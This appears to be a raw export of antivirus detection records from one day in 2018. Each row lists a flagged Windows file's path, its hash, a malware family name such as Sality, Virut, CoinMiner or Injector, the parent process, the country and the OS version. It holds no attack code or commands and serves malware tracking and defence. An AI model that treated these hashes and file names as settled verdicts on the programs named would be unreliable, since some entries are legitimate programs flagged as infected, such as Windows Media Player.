  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T23:59:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DE2187224FEDA579125DC15840138845305E6FFD6AA64B56B8EC772ED353152', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:50:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:08:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\AVIRA\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T14:15:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:04:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crashes.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Starting_the_Game\\Crashes\\Crashes.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150028-e2fde5d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150028-E2FDE5D8', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='help_th.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\HELP_TH\\HELP_TH.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lists.exe', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Image Lists\\Lists.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='1061d0e1699199ae5f33c83ea677e2e346b19665296a6284a082f75c1030e7ef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06C59D22D87B82286E1FDE0EBF429444D3F190E5D1BAC53B199AA7D96E9B1B99', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\Drivers Rodolfo\\Intel USB 3.0 Driver\\Setup.exe', filesize=1024000, name='W32/Stanit.#M1.#R1'), hash='43c78f49715d2f67d40bfe010a3d9d81a7ff22eeca4f82b9a24d8edd360f8b21', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170757-56b74070', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aae89d63\\AVSCAN-20181102-170730-537F3516\\AVSCAN-20181102-170757-56B74070', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:07:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\36A923DC3A8D30639F68EED2531E7D5052B4C7EA466EB591E6153E15B5EFF975', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:33:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:29:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:32:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gpup.exe', filepath='J:\\Lupo.PenSuite.v2016.Full.MULTI-FREE\\Lupo.PenSuite.v2016.Full.MULTI-FREE\\Lupo_PenSuite_v2016_Full\\Apps\\Notepad++\\updater\\gpup.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='38fa159ea7e5bc859487968f5a8bf8438feb82e6908cb139ea28f7fe34e89584', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='I:\\PROGRAMAS\\PNGoo.0.1.1\\PNGoo.exe', parentsize=91136, timestamp='2018-11-02T04:27:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='010_4b29ace8_5d35dba5.exe', filepath='C:\\Users\\X\\Videos\\010_4b29ace8_5d35dba5.exe', filesize=223744000, name='HEUR/AGEN.1020711.#M1.#R1'), hash='275708ee348025aa0ed366d42feab1944c5c7411f2c2209c84cefa0a9d77e38d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T09:39:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T11:09:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0113434.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113434.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055236-7823c5b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055236-7823C5B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='61e0844a47e4d1b0bf138fd02f1b389c2720f77b60f27ca4f87ae9e658ad6459', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\61E0844A47E4D1B0BF138FD02F1B389C2720F77B60F27CA4F87AE9E658AD6459', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='61e0844a47e4d1b0bf138fd02f1b389c2720f77b60f27ca4f87ae9e658ad6459', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143719-526266d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143719-526266D0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00000959', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp00000959', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:44:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T15:00:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3368.37276\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='a70a003acda2a13c1bad50d2ba0139ac', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3368.37276\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:15:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054204-ffb8d3f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054204-FFB8D3F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133826-177f9c67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dcaa7d8e\\AVSCAN-20181102-133648-0E0FAEE6\\AVSCAN-20181102-133826-177F9C67', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:38:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000075fe', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000075fe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:51:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092201-88c6e57a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8d9ba85\\AVSCAN-20181102-092152-8712CD94\\AVSCAN-20181102-092201-88C6E57A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:22:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051726-8e959830', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051726-8E959830', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085725-61993a10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94e64d75\\AVSCAN-20181102-085632-58407B3F\\AVSCAN-20181102-085725-61993A10', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:57:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052829-19f593fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052829-19F593FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061407-7a0957d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061407-7A0957D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090956-df46ba8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a95d6325\\AVSCAN-20181102-084022-64C18A0E\\AVSCAN-20181102-090956-DF46BA8C', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052252-511c92d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052252-511C92D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052223-3fc6ce24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052223-3FC6CE24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unkmokmx.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\uNkMOKMx.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052814-10ab078a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052814-10AB078A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061205-31580807', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061205-31580807', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:04Z'), dt=datetime.date(2018, 11, 2)),
